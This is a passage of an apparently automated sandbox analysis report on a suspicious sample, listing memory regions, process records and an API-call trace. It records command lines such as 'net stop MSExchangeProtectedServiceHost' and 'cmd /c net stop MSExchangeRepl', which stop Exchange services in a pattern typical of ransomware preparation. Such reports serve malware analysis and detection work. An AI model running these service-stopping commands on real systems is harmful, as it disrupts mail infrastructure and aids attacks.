"private_0x0000000004ea0000" filename = "" Region: id = 11442 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Thread: id = 700 os_tid = 0xc40 Thread: id = 701 os_tid = 0xc54 Process: id = "236" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x140ee000" os_pid = "0xc4c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "235" os_parent_pid = "0xc5c" cmd_line = "C:\\Windows\\system32\\net1 stop MSExchangeProtectedServiceHost" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11443 start_va = 0x4e0000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 11444 start_va = 0x500000 end_va = 0x501fff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 11445 start_va = 0x510000 end_va = 0x523fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 11446 start_va = 0x530000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 11447 start_va = 0x570000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 11448 start_va = 0x5f0000 end_va = 0x5f3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 11449 start_va = 0x600000 end_va = 0x600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 11450 start_va = 0x610000 end_va = 0x611fff entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 11451 start_va = 0x1080000 end_va = 0x10b1fff entry_point = 0x1080000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe") Region: id = 11452 start_va = 0x10c0000 end_va = 0x50bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010c0000" filename = "" Region: id = 11453 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 11454 start_va = 0x7f5b0000 end_va = 0x7f5d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f5b0000" filename = "" Region: id = 11455 start_va = 0x7f5db000 end_va = 0x7f5dbfff entry_point = 0x0 region_type = private name = "private_0x000000007f5db000" filename = "" Region: id = 11456 start_va = 0x7f5dc000 end_va = 0x7f5defff entry_point = 0x0 region_type = private name = "private_0x000000007f5dc000" filename = "" Region: id = 11457 start_va = 0x7f5df000 end_va = 0x7f5dffff entry_point = 0x0 region_type = private name = "private_0x000000007f5df000" filename = "" Region: id = 11458 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 11459 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 11460 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 11461 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11462 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 11463 start_va = 0x6e0000 end_va = 0x6effff entry_point = 0x0 region_type = private name = "private_0x00000000006e0000" filename = "" Region: id = 11464 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 11465 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 11466 start_va = 0x710000 end_va = 0x80ffff entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 11467 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 11468 start_va = 0x4e0000 end_va = 0x4effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 11469 start_va = 0x4f0000 end_va = 0x4f3fff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 11470 start_va = 0x620000 end_va = 0x6ddfff entry_point = 0x620000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11471 start_va = 0x810000 end_va = 0x84ffff entry_point = 0x0 region_type = private name = "private_0x0000000000810000" filename = "" Region: id = 11472 start_va = 0x850000 end_va = 0x8cffff entry_point = 0x0 region_type = private name = "private_0x0000000000850000" filename = "" Region: id = 11473 start_va = 0x910000 end_va = 0x91ffff entry_point = 0x0 region_type = private name = "private_0x0000000000910000" filename = "" Region: id = 11474 start_va = 0x74a00000 end_va = 0x74a2efff entry_point = 0x74a00000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll") Region: id = 11475 start_va = 0x74a30000 end_va = 0x74a37fff entry_point = 0x74a30000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll") Region: id = 11476 start_va = 0x74a40000 end_va = 0x74a4efff entry_point = 0x74a40000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 11477 start_va = 0x74a50000 end_va = 0x74a63fff entry_point = 0x74a50000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 11478 start_va = 0x74ac0000 end_va = 0x74ac9fff entry_point = 0x74ac0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 11479 start_va = 0x74ad0000 end_va = 0x74aebfff entry_point = 0x74ad0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 11480 start_va = 0x74af0000 end_va = 0x74b0afff entry_point = 0x74af0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 11481 start_va = 0x74b10000 end_va = 0x74b1ffff entry_point = 0x74b10000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 11482 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 11483 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 11484 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 11485 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 11486 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 11487 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 11488 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 11489 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 11490 start_va = 0x7f4b0000 end_va = 0x7f5affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f4b0000" filename = "" Region: id = 11491 start_va = 0x7f5d8000 end_va = 0x7f5dafff entry_point = 0x0 region_type = private name = "private_0x000000007f5d8000" filename = "" Region: id = 11492 start_va = 0x500000 end_va = 0x503fff entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 11493 start_va = 0x6f0000 end_va = 0x6f2fff entry_point = 0x6f0000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\SysWOW64\\netmsg.dll" (normalized: "c:\\windows\\syswow64\\netmsg.dll") Region: id = 11494 start_va = 0x8d0000 end_va = 0x901fff entry_point = 0x8d0000 region_type = mapped_file name = "netmsg.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\netmsg.dll.mui") Thread: id = 702 os_tid = 0xff0 [0139.008] GetModuleHandleA (lpModuleName=0x0) returned 0x1080000 [0139.008] __set_app_type (_Type=0x1) [0139.008] __p__fmode () returned 0x77ac4d6c [0139.008] __p__commode () returned 0x77ac5b1c [0139.008] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1087020) returned 0x0 [0139.008] __getmainargs (in: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690, _DoWildCard=0, _StartInfo=0x109f69c | out: _Argc=0x109f688, _Argv=0x109f68c, _Env=0x109f690) returned 0 [0139.009] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0139.009] GetConsoleOutputCP () returned 0x1b5 [0139.009] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x10a7020 | out: lpCPInfo=0x10a7020) returned 1 [0139.009] SetThreadUILanguage (LangId=0x0) returned 0x409 [0139.011] sprintf_s (in: _DstBuf=0x5efbd4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0139.011] setlocale (category=0, locale=".437") returned="English_United States.437" [0139.012] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0139.012] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0139.012] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeProtectedServiceHost" [0139.012] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x5ef97c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0139.012] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x5ef970 | out: Buffer=0x5ef970*=0x717f70) returned 0x0 [0139.012] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x5ef974 | out: Buffer=0x5ef974*=0x717fb8) returned 0x0 [0139.013] __iob_func () returned 0x77ac1208 [0139.013] _fileno (_File=0x77ac1208) returned 0 [0139.013] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0139.013] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0139.013] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0139.013] _wcsicmp (_String1="config", _String2="stop") returned -16 [0139.013] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0139.013] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0139.013] _wcsicmp (_String1="file", _String2="stop") returned -13 [0139.013] _wcsicmp (_String1="files", _String2="stop") returned -13 [0139.013] _wcsicmp (_String1="group", _String2="stop") returned -12 [0139.013] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0139.013] _wcsicmp (_String1="help", _String2="stop") returned -11 [0139.013] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0139.013] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0139.013] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0139.013] _wcsicmp (_String1="session", _String2="stop") returned -15 [0139.013] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0139.013] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0139.013] _wcsicmp (_String1="share", _String2="stop") returned -12 [0139.013] _wcsicmp (_String1="start", _String2="stop") returned -14 [0139.013] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0139.013] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0139.013] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0139.013] _wcsicmp (_String1="accounts", _String2="MSExchangeProtectedServiceHost") returned -12 [0139.013] _wcsicmp (_String1="computer", _String2="MSExchangeProtectedServiceHost") returned -10 [0139.013] _wcsicmp (_String1="config", _String2="MSExchangeProtectedServiceHost") returned -10 [0139.013] _wcsicmp (_String1="continue", _String2="MSExchangeProtectedServiceHost") returned -10 [0139.013] _wcsicmp (_String1="cont", _String2="MSExchangeProtectedServiceHost") returned -10 [0139.013] _wcsicmp (_String1="file", _String2="MSExchangeProtectedServiceHost") returned -7 [0139.013] _wcsicmp (_String1="files", _String2="MSExchangeProtectedServiceHost") returned -7 [0139.013] _wcsicmp (_String1="group", _String2="MSExchangeProtectedServiceHost") returned -6 [0139.013] _wcsicmp (_String1="groups", _String2="MSExchangeProtectedServiceHost") returned -6 [0139.013] _wcsicmp (_String1="help", _String2="MSExchangeProtectedServiceHost") returned -5 [0139.013] _wcsicmp (_String1="helpmsg", _String2="MSExchangeProtectedServiceHost") returned -5 [0139.013] _wcsicmp (_String1="localgroup", _String2="MSExchangeProtectedServiceHost") returned -1 [0139.013] _wcsicmp (_String1="pause", _String2="MSExchangeProtectedServiceHost") returned 3 [0139.013] _wcsicmp (_String1="session", _String2="MSExchangeProtectedServiceHost") returned 6 [0139.013] _wcsicmp (_String1="sessions", _String2="MSExchangeProtectedServiceHost") returned 6 [0139.013] _wcsicmp (_String1="sess", _String2="MSExchangeProtectedServiceHost") returned 6 [0139.013] _wcsicmp (_String1="share", _String2="MSExchangeProtectedServiceHost") returned 6 [0139.013] _wcsicmp (_String1="start", _String2="MSExchangeProtectedServiceHost") returned 6 [0139.013] _wcsicmp (_String1="stats", _String2="MSExchangeProtectedServiceHost") returned 6 [0139.014] _wcsicmp (_String1="statistics", _String2="MSExchangeProtectedServiceHost") returned 6 [0139.014] _wcsicmp (_String1="stop", _String2="MSExchangeProtectedServiceHost") returned 6 [0139.014] _wcsicmp (_String1="time", _String2="MSExchangeProtectedServiceHost") returned 7 [0139.014] _wcsicmp (_String1="user", _String2="MSExchangeProtectedServiceHost") returned 8 [0139.014] _wcsicmp (_String1="users", _String2="MSExchangeProtectedServiceHost") returned 8 [0139.014] _wcsicmp (_String1="msg", _String2="MSExchangeProtectedServiceHost") returned 2 [0139.014] _wcsicmp (_String1="messenger", _String2="MSExchangeProtectedServiceHost") returned -14 [0139.014] _wcsicmp (_String1="receiver", _String2="MSExchangeProtectedServiceHost") returned 5 [0139.014] _wcsicmp (_String1="rcv", _String2="MSExchangeProtectedServiceHost") returned 5 [0139.014] _wcsicmp (_String1="netpopup", _String2="MSExchangeProtectedServiceHost") returned 1 [0139.014] _wcsicmp (_String1="redirector", _String2="MSExchangeProtectedServiceHost") returned 5 [0139.014] _wcsicmp (_String1="redir", _String2="MSExchangeProtectedServiceHost") returned 5 [0139.014] _wcsicmp (_String1="rdr", _String2="MSExchangeProtectedServiceHost") returned 5 [0139.014] _wcsicmp (_String1=0x1081ffc, _String2="MSExchangeProtectedServiceHost") returned 10 [0139.014] _wcsicmp (_String1="work", _String2="MSExchangeProtectedServiceHost") returned 10 [0139.014] _wcsicmp (_String1="wksta", _String2="MSExchangeProtectedServiceHost") returned 10 [0139.014] _wcsicmp (_String1="prdr", _String2="MSExchangeProtectedServiceHost") returned 3 [0139.014] _wcsicmp (_String1="devrdr", _String2="MSExchangeProtectedServiceHost") returned -9 [0139.014] _wcsicmp (_String1="lanmanworkstation", _String2="MSExchangeProtectedServiceHost") returned -1 [0139.014] _wcsicmp (_String1="server", _String2="MSExchangeProtectedServiceHost") returned 6 [0139.014] _wcsicmp (_String1="svr", _String2="MSExchangeProtectedServiceHost") returned 6 [0139.014] _wcsicmp (_String1="srv", _String2="MSExchangeProtectedServiceHost") returned 6 [0139.014] _wcsicmp (_String1="lanmanserver", _String2="MSExchangeProtectedServiceHost") returned -1 [0139.014] _wcsicmp (_String1="alerter", _String2="MSExchangeProtectedServiceHost") returned -12 [0139.014] _wcsicmp (_String1="netlogon", _String2="MSExchangeProtectedServiceHost") returned 1 [0139.014] _wcsupr (in: _String="MSExchangeProtectedServiceHost" | out: _String="MSEXCHANGEPROTECTEDSERVICEHOST") returned="MSEXCHANGEPROTECTEDSERVICEHOST" [0139.014] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x712650 [0139.016] GetServiceKeyNameW (in: hSCManager=0x712650, lpDisplayName="MSEXCHANGEPROTECTEDSERVICEHOST", lpServiceName=0x10a8cb0, lpcchBuffer=0x5ef8ec | out: lpServiceName="", lpcchBuffer=0x5ef8ec) returned 0 [0139.017] _wcsicmp (_String1="msg", _String2="MSEXCHANGEPROTECTEDSERVICEHOST") returned 2 [0139.017] _wcsicmp (_String1="messenger", _String2="MSEXCHANGEPROTECTEDSERVICEHOST") returned -14 [0139.017] _wcsicmp (_String1="receiver", _String2="MSEXCHANGEPROTECTEDSERVICEHOST") returned 5 [0139.017] _wcsicmp (_String1="rcv", _String2="MSEXCHANGEPROTECTEDSERVICEHOST") returned 5 [0139.017] _wcsicmp (_String1="redirector", _String2="MSEXCHANGEPROTECTEDSERVICEHOST") returned 5 [0139.017] _wcsicmp (_String1="redir", _String2="MSEXCHANGEPROTECTEDSERVICEHOST") returned 5 [0139.017] _wcsicmp (_String1="rdr", _String2="MSEXCHANGEPROTECTEDSERVICEHOST") returned 5 [0139.017] _wcsicmp (_String1="workstation", _String2="MSEXCHANGEPROTECTEDSERVICEHOST") returned 10 [0139.017] _wcsicmp (_String1="work", _String2="MSEXCHANGEPROTECTEDSERVICEHOST") returned 10 [0139.017] _wcsicmp (_String1="wksta", _String2="MSEXCHANGEPROTECTEDSERVICEHOST") returned 10 [0139.017] _wcsicmp (_String1="prdr", _String2="MSEXCHANGEPROTECTEDSERVICEHOST") returned 3 [0139.017] _wcsicmp (_String1="devrdr", _String2="MSEXCHANGEPROTECTEDSERVICEHOST") returned -9 [0139.017] _wcsicmp (_String1="lanmanworkstation", _String2="MSEXCHANGEPROTECTEDSERVICEHOST") returned -1 [0139.017] _wcsicmp (_String1="server", _String2="MSEXCHANGEPROTECTEDSERVICEHOST") returned 6 [0139.017] _wcsicmp (_String1="svr", _String2="MSEXCHANGEPROTECTEDSERVICEHOST") returned 6 [0139.017] _wcsicmp (_String1="srv", _String2="MSEXCHANGEPROTECTEDSERVICEHOST") returned 6 [0139.017] _wcsicmp (_String1="lanmanserver", _String2="MSEXCHANGEPROTECTEDSERVICEHOST") returned -1 [0139.017] _wcsicmp (_String1="alerter", _String2="MSEXCHANGEPROTECTEDSERVICEHOST") returned -12 [0139.017] _wcsicmp (_String1="netlogon", _String2="MSEXCHANGEPROTECTEDSERVICEHOST") returned 1 [0139.017] _wcsicmp (_String1="MSEXCHANGEPROTECTEDSERVICEHOST", _String2="WORKSTATION") returned -10 [0139.017] _wcsicmp (_String1="MSEXCHANGEPROTECTEDSERVICEHOST", _String2="LanmanWorkstation") returned 1 [0139.017] _wcsicmp (_String1="MSEXCHANGEPROTECTEDSERVICEHOST", _String2="SERVER") returned -6 [0139.017] _wcsicmp (_String1="MSEXCHANGEPROTECTEDSERVICEHOST", _String2="LanmanServer") returned 1 [0139.017] _wcsicmp (_String1="MSEXCHANGEPROTECTEDSERVICEHOST", _String2="BROWSER") returned 11 [0139.017] _wcsicmp (_String1="MSEXCHANGEPROTECTEDSERVICEHOST", _String2="BROWSER") returned 11 [0139.017] _wcsicmp (_String1="MSEXCHANGEPROTECTEDSERVICEHOST", _String2="MESSENGER") returned 14 [0139.017] _wcsicmp (_String1="MSEXCHANGEPROTECTEDSERVICEHOST", _String2="MESSENGER") returned 14 [0139.017] _wcsicmp (_String1="MSEXCHANGEPROTECTEDSERVICEHOST", _String2="NETRUN") returned -1 [0139.017] _wcsicmp (_String1="MSEXCHANGEPROTECTEDSERVICEHOST", _String2="NETRUN") returned -1 [0139.017] _wcsicmp (_String1="MSEXCHANGEPROTECTEDSERVICEHOST", _String2="SPOOLER") returned -6 [0139.017] _wcsicmp (_String1="MSEXCHANGEPROTECTEDSERVICEHOST", _String2="SPOOLER") returned -6 [0139.017] _wcsicmp (_String1="MSEXCHANGEPROTECTEDSERVICEHOST", _String2="ALERTER") returned 12 [0139.017] _wcsicmp (_String1="MSEXCHANGEPROTECTEDSERVICEHOST", _String2="ALERTER") returned 12 [0139.017] _wcsicmp (_String1="MSEXCHANGEPROTECTEDSERVICEHOST", _String2="NETLOGON") returned -1 [0139.017] _wcsicmp (_String1="MSEXCHANGEPROTECTEDSERVICEHOST", _String2="NETLOGON") returned -1 [0139.017] _wcsicmp (_String1="MSEXCHANGEPROTECTEDSERVICEHOST", _String2="NETPOPUP") returned -1 [0139.017] _wcsicmp (_String1="MSEXCHANGEPROTECTEDSERVICEHOST", _String2="NETPOPUP") returned -1 [0139.017] _wcsicmp (_String1="MSEXCHANGEPROTECTEDSERVICEHOST", _String2="SQLSERVER") returned -6 [0139.017] _wcsicmp (_String1="MSEXCHANGEPROTECTEDSERVICEHOST", _String2="SQLSERVER") returned -6 [0139.017] _wcsicmp (_String1="MSEXCHANGEPROTECTEDSERVICEHOST", _String2="REPLICATOR") returned -5 [0139.017] _wcsicmp (_String1="MSEXCHANGEPROTECTEDSERVICEHOST", _String2="REPLICATOR") returned -5 [0139.017] _wcsicmp (_String1="MSEXCHANGEPROTECTEDSERVICEHOST", _String2="REMOTEBOOT") returned -5 [0139.017] _wcsicmp (_String1="MSEXCHANGEPROTECTEDSERVICEHOST", _String2="REMOTEBOOT") returned -5 [0139.017] _wcsicmp (_String1="MSEXCHANGEPROTECTEDSERVICEHOST", _String2="TIMESOURCE") returned -7 [0139.017] _wcsicmp (_String1="MSEXCHANGEPROTECTEDSERVICEHOST", _String2="TIMESOURCE") returned -7 [0139.017] _wcsicmp (_String1="MSEXCHANGEPROTECTEDSERVICEHOST", _String2="AFP") returned 12 [0139.017] _wcsicmp (_String1="MSEXCHANGEPROTECTEDSERVICEHOST", _String2="AFP") returned 12 [0139.017] _wcsicmp (_String1="MSEXCHANGEPROTECTEDSERVICEHOST", _String2="UPS") returned -8 [0139.017] _wcsicmp (_String1="MSEXCHANGEPROTECTEDSERVICEHOST", _String2="UPS") returned -8 [0139.017] _wcsicmp (_String1="MSEXCHANGEPROTECTEDSERVICEHOST", _String2="XACTSRV") returned -11 [0139.018] _wcsicmp (_String1="MSEXCHANGEPROTECTEDSERVICEHOST", _String2="XACTSRV") returned -11 [0139.018] _wcsicmp (_String1="MSEXCHANGEPROTECTEDSERVICEHOST", _String2="TCPIP") returned -7 [0139.018] _wcsicmp (_String1="MSEXCHANGEPROTECTEDSERVICEHOST", _String2="TCPIP") returned -7 [0139.018] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x71b088 [0139.018] OpenServiceW (hSCManager=0x71b088, lpServiceName="MSEXCHANGEPROTECTEDSERVICEHOST", dwDesiredAccess=0x84) returned 0x0 [0139.018] GetLastError () returned 0x424 [0139.018] CloseServiceHandle (hSCObject=0x71b088) returned 1 [0139.018] wcscpy_s (in: _Destination=0x10a7698, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0139.018] LoadLibraryW (lpLibFileName="NETMSG") returned 0x6f0000 [0139.019] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x6f0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0139.020] GetFileType (hFile=0x40) returned 0x2 [0139.020] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x5ef788 | out: lpMode=0x5ef788) returned 1 [0139.020] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x5ef794, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0x5ef794*=0x1e) returned 1 [0139.021] GetFileType (hFile=0x40) returned 0x2 [0139.021] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x5ef788 | out: lpMode=0x5ef788) returned 1 [0139.021] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x5ef794, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0x5ef794*=0x2) returned 1 [0139.021] _ultow (in: _Dest=0x889, _Radix=6223784 | out: _Dest=0x889) returned="2185" [0139.021] FormatMessageW (in: dwFlags=0x2800, lpSource=0x6f0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x10a7ca8, nSize=0x800, Arguments=0x10a7450 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0139.021] GetFileType (hFile=0x40) returned 0x2 [0139.021] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x5ef778 | out: lpMode=0x5ef778) returned 1 [0139.022] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x10a7ca8*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x5ef784, lpReserved=0x0 | out: lpBuffer=0x10a7ca8*, lpNumberOfCharsWritten=0x5ef784*=0x34) returned 1 [0139.022] GetFileType (hFile=0x40) returned 0x2 [0139.022] GetConsoleMode (in: hConsoleHandle=0x40, lpMode=0x5ef778 | out: lpMode=0x5ef778) returned 1 [0139.022] WriteConsoleW (in: hConsoleOutput=0x40, lpBuffer=0x1081250*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x5ef784, lpReserved=0x0 | out: lpBuffer=0x1081250*, lpNumberOfCharsWritten=0x5ef784*=0x2) returned 1 [0139.022] NetApiBufferFree (Buffer=0x717f70) returned 0x0 [0139.022] NetApiBufferFree (Buffer=0x717fb8) returned 0x0 [0139.022] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSExchangeProtectedServiceHost" [0139.022] exit (_Code=2) Thread: id = 703 os_tid = 0xc30 Process: id = "237" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x14527000" os_pid = "0xc1c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c net stop MSExchangeRepl" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11495 start_va = 0x3c0000 